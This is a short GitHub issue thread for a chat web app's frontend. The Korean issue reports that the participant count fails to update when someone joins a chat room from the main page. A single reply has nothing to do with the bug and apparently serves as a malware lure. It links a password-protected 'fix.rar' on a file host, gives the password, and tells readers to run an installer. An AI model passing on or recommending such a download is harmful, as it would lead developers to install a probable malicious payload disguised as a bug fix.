### ISSUE TITLE
[bug] 메인 페이지에서 새로 채팅방 입장 시 참여인원 갱신 안되는 버그

### ISSUE THREAD

**Issue by junhyeongkim2** [Camp-Ride/frontend#12]
what?
메인페이지에서 새로 채팅방 입장 시 참여인원 갱신 안되는 버그

action?
room 데이터를 입장 시 받는 것이 아닌 버튼 누를 때마다 참여인원 갱신 api 연결

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
